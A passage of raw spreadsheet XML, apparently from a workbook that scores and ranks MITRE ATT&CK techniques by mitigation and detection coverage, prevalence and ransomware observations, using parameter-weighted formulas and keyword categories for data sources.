        <f t="array" ref="AM588">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD588)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN588" s="37">
        <v>0</v>
      </c>
      <c r="AO588" s="37">
        <v>1</v>
      </c>
      <c r="AP588" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ588" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>38.950000000000003</v>
      </c>
      <c r="AR588" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS588" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT588" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU58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0.95119047619047614</v>
      </c>
    </row>
    <row r="589" spans="1:47" ht="17">
      <c r="A589" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B589" s="37">
        <f t="shared" si="9"/>
        <v>117.05000000000001</v>
      </c>
      <c r="C589" s="37" t="s">
        <v>1927</v>
      </c>
      <c r="D589" s="50" t="s">
        <v>1928</v>
      </c>
      <c r="E589" s="37"/>
      <c r="F589" s="37">
        <v>0</v>
      </c>
      <c r="G589" s="37">
        <v>1</v>
      </c>
      <c r="H589" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I589" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J589" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K589" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L589" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M589" s="37">
        <v>0</v>
      </c>
      <c r="N589" s="56">
        <v>0</v>
      </c>
      <c r="O589" s="56">
        <v>0</v>
      </c>
      <c r="P589" s="56">
        <v>0</v>
      </c>
      <c r="Q589" s="56">
        <v>0</v>
      </c>
      <c r="R589" s="57"/>
      <c r="S589" s="57">
        <v>0</v>
      </c>
      <c r="T589" s="57"/>
      <c r="U589" s="57">
        <v>0</v>
      </c>
      <c r="V589" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W589" s="37">
        <v>0</v>
      </c>
      <c r="X589" s="37">
        <v>0</v>
      </c>
      <c r="Y589" s="37">
        <v>0</v>
      </c>
      <c r="Z589" s="37">
        <v>0</v>
      </c>
      <c r="AA589" s="37">
        <v>0</v>
      </c>
      <c r="AB589" s="37">
        <v>0</v>
      </c>
      <c r="AC589" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD589" s="50"/>
      <c r="AE589" s="37" t="str" cm="1">
        <f t="array" ref="AE589">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD589)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF589" s="37">
        <v>585</v>
      </c>
      <c r="AG589" s="37" t="str" cm="1">
        <f t="array" ref="AG589">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD589)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH589" s="37">
        <v>585</v>
      </c>
      <c r="AI589" s="37" t="str" cm="1">
        <f t="array" ref="AI589">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD589)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ589" s="37">
        <v>585</v>
      </c>
      <c r="AK589" s="37" t="str" cm="1">
        <f t="array" ref="AK589">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD589)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL589" s="37">
        <v>585</v>
      </c>
      <c r="AM589" s="37" t="str" cm="1">
        <f t="array" ref="AM589">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD589)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN589" s="37">
        <v>0</v>
      </c>
      <c r="AO589" s="37">
        <v>0</v>
      </c>
      <c r="AP589" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ589" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.016666666666673</v>
      </c>
      <c r="AR589" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS589" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT589" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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90" spans="1:47" ht="17">
      <c r="A590" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B590" s="37">
        <f t="shared" si="9"/>
        <v>117.25</v>
      </c>
      <c r="C590" s="37" t="s">
        <v>1929</v>
      </c>
      <c r="D590" s="50" t="s">
        <v>1928</v>
      </c>
      <c r="E590" s="37" t="s">
        <v>1930</v>
      </c>
      <c r="F590" s="37">
        <v>0</v>
      </c>
      <c r="G590" s="37">
        <v>1</v>
      </c>
      <c r="H590" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I590" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J590" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K590" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L590" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M590" s="37">
        <v>0</v>
      </c>
      <c r="N590" s="56">
        <v>0</v>
      </c>
      <c r="O590" s="56">
        <v>0</v>
      </c>
      <c r="P590" s="56">
        <v>0</v>
      </c>
      <c r="Q590" s="56">
        <v>0</v>
      </c>
      <c r="R590" s="57"/>
      <c r="S590" s="57">
        <v>0</v>
      </c>
      <c r="T590" s="57"/>
      <c r="U590" s="57">
        <v>0</v>
      </c>
      <c r="V590" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W590" s="37">
        <v>0</v>
      </c>
      <c r="X590" s="37">
        <v>0</v>
      </c>
      <c r="Y590" s="37">
        <v>0</v>
      </c>
      <c r="Z590" s="37">
        <v>0</v>
      </c>
      <c r="AA590" s="37">
        <v>0</v>
      </c>
      <c r="AB590" s="37">
        <v>0</v>
      </c>
      <c r="AC590" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD590" s="50"/>
      <c r="AE590" s="37" t="str" cm="1">
        <f t="array" ref="AE590">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD590)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF590" s="37">
        <v>586</v>
      </c>
      <c r="AG590" s="37" t="str" cm="1">
        <f t="array" ref="AG590">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD590)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH590" s="37">
        <v>586</v>
      </c>
      <c r="AI590" s="37" t="str" cm="1">
        <f t="array" ref="AI590">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD590)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ590" s="37">
        <v>586</v>
      </c>
      <c r="AK590" s="37" t="str" cm="1">
        <f t="array" ref="AK590">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD590)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL590" s="37">
        <v>586</v>
      </c>
      <c r="AM590" s="37" t="str" cm="1">
        <f t="array" ref="AM590">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD590)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN590" s="37">
        <v>0</v>
      </c>
      <c r="AO590" s="37">
        <v>0</v>
      </c>
      <c r="AP590" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ590" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.083333333333336</v>
      </c>
      <c r="AR590" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS590" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT590" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU59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91" spans="1:47" ht="17">
      <c r="A591" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B591" s="37">
        <f t="shared" si="9"/>
        <v>117.45</v>
      </c>
      <c r="C591" s="37" t="s">
        <v>1931</v>
      </c>
      <c r="D591" s="50" t="s">
        <v>1928</v>
      </c>
      <c r="E591" s="37" t="s">
        <v>1932</v>
      </c>
      <c r="F591" s="37">
        <v>0</v>
      </c>
      <c r="G591" s="37">
        <v>1</v>
      </c>
      <c r="H591" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I591" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J591" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K591" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L591" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M591" s="37">
        <v>0</v>
      </c>
      <c r="N591" s="56">
        <v>0</v>
      </c>
      <c r="O591" s="56">
        <v>0</v>
      </c>
      <c r="P591" s="56">
        <v>0</v>
      </c>
      <c r="Q591" s="56">
        <v>0</v>
      </c>
      <c r="R591" s="57"/>
      <c r="S591" s="57">
        <v>0</v>
      </c>
      <c r="T591" s="57"/>
      <c r="U591" s="57">
        <v>0</v>
      </c>
      <c r="V591" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W591" s="37">
        <v>0</v>
      </c>
      <c r="X591" s="37">
        <v>0</v>
      </c>
      <c r="Y591" s="37">
        <v>0</v>
      </c>
      <c r="Z591" s="37">
        <v>0</v>
      </c>
      <c r="AA591" s="37">
        <v>0</v>
      </c>
      <c r="AB591" s="37">
        <v>0</v>
      </c>
      <c r="AC591" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD591" s="50"/>
      <c r="AE591" s="37" t="str" cm="1">
        <f t="array" ref="AE591">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD591)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF591" s="37">
        <v>587</v>
      </c>
      <c r="AG591" s="37" t="str" cm="1">
        <f t="array" ref="AG591">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD591)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH591" s="37">
        <v>587</v>
      </c>
      <c r="AI591" s="37" t="str" cm="1">
        <f t="array" ref="AI591">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD591)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ591" s="37">
        <v>587</v>
      </c>
      <c r="AK591" s="37" t="str" cm="1">
        <f t="array" ref="AK591">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD591)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL591" s="37">
        <v>587</v>
      </c>
      <c r="AM591" s="37" t="str" cm="1">
        <f t="array" ref="AM591">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD591)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN591" s="37">
        <v>0</v>
      </c>
      <c r="AO591" s="37">
        <v>0</v>
      </c>
      <c r="AP591" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ591" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.15</v>
      </c>
      <c r="AR591" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS591" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT591" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU59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92" spans="1:47" ht="51">
      <c r="A592" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B592" s="37">
        <f t="shared" si="9"/>
        <v>431.38277309523818</v>
      </c>
      <c r="C592" s="37" t="s">
        <v>1933</v>
      </c>
      <c r="D592" s="50" t="s">
        <v>1934</v>
      </c>
      <c r="E592" s="37"/>
      <c r="F592" s="37">
        <v>0</v>
      </c>
      <c r="G592" s="37">
        <v>1</v>
      </c>
      <c r="H592" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I592" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J592" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K592" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L592" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M592" s="37">
        <v>0</v>
      </c>
      <c r="N592" s="56">
        <v>0</v>
      </c>
      <c r="O592" s="56">
        <v>0</v>
      </c>
      <c r="P592" s="56">
        <v>0</v>
      </c>
      <c r="Q592" s="56">
        <v>0</v>
      </c>
      <c r="R592" s="57" t="s">
        <v>416</v>
      </c>
      <c r="S592" s="57">
        <v>3</v>
      </c>
      <c r="T592" s="57" t="s">
        <v>1667</v>
      </c>
      <c r="U592" s="57">
        <v>11</v>
      </c>
      <c r="V592" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W592" s="37">
        <v>14</v>
      </c>
      <c r="X592" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y592" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z592" s="37">
        <v>0</v>
      </c>
      <c r="AA592" s="37">
        <v>0</v>
      </c>
      <c r="AB592" s="37">
        <v>0</v>
      </c>
      <c r="AC592" s="37"/>
      <c r="AD592" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE592" s="37" t="str" cm="1">
        <f t="array" ref="AE592">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD592)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF592" s="37">
        <v>588</v>
      </c>
      <c r="AG592" s="37" t="str" cm="1">
        <f t="array" ref="AG592">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD592)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH592" s="37">
        <v>588</v>
      </c>
      <c r="AI592" s="37" t="str" cm="1">
        <f t="array" ref="AI592">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD592)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ592" s="37">
        <v>588</v>
      </c>
      <c r="AK592" s="37" t="str" cm="1">
        <f t="array" ref="AK592">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD592)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL592" s="37">
        <v>588</v>
      </c>
      <c r="AM592" s="37" t="str" cm="1">
        <f t="array" ref="AM592">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD592)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN592" s="37">
        <v>0</v>
      </c>
      <c r="AO592" s="37">
        <v>2</v>
      </c>
      <c r="AP592" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ592" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>143.79425769841274</v>
      </c>
      <c r="AR592" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS592" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT592" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU59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6.8949646523053678</v>
      </c>
    </row>
    <row r="593" spans="1:47" ht="51">
      <c r="A593" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B593" s="37">
        <f t="shared" si="9"/>
        <v>342.32596599999999</v>
      </c>
      <c r="C593" s="37" t="s">
        <v>1935</v>
      </c>
      <c r="D593" s="50" t="s">
        <v>1934</v>
      </c>
      <c r="E593" s="37" t="s">
        <v>1936</v>
      </c>
      <c r="F593" s="37">
        <v>0</v>
      </c>
      <c r="G593" s="37">
        <v>1</v>
      </c>
      <c r="H593" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I593" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J593" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K593" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L593" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M593" s="37">
        <v>0</v>
      </c>
      <c r="N593" s="56">
        <v>0</v>
      </c>
      <c r="O593" s="56">
        <v>0</v>
      </c>
      <c r="P593" s="56">
        <v>0</v>
      </c>
      <c r="Q593" s="56">
        <v>0</v>
      </c>
      <c r="R593" s="57" t="s">
        <v>416</v>
      </c>
      <c r="S593" s="57">
        <v>3</v>
      </c>
      <c r="T593" s="57" t="s">
        <v>1937</v>
      </c>
      <c r="U593" s="57">
        <v>7</v>
      </c>
      <c r="V593" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238000000000003E-2</v>
      </c>
      <c r="W593" s="37">
        <v>10</v>
      </c>
      <c r="X593" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y593" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z593" s="37">
        <v>0</v>
      </c>
      <c r="AA593" s="37">
        <v>0</v>
      </c>
      <c r="AB593" s="37">
        <v>0</v>
      </c>
      <c r="AC593" s="37"/>
      <c r="AD593" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE593" s="37" t="str" cm="1">
        <f t="array" ref="AE593">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD593)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF593" s="37">
        <v>589</v>
      </c>
      <c r="AG593" s="37" t="str" cm="1">
        <f t="array" ref="AG593">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD593)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH593" s="37">
        <v>589</v>
      </c>
      <c r="AI593" s="37" t="str" cm="1">
        <f t="array" ref="AI593">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD593)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ593" s="37">
        <v>589</v>
      </c>
      <c r="AK593" s="37" t="str" cm="1">
        <f t="array" ref="AK593">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD593)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL593" s="37">
        <v>589</v>
      </c>
      <c r="AM593" s="37" t="str" cm="1">
        <f t="array" ref="AM593">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD593)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN593" s="37">
        <v>0</v>
      </c>
      <c r="AO593" s="37">
        <v>2</v>
      </c>
      <c r="AP593" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ593" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>114.10865533333333</v>
      </c>
      <c r="AR593" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS593" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT593" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU59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5.4813645396825388</v>
      </c>
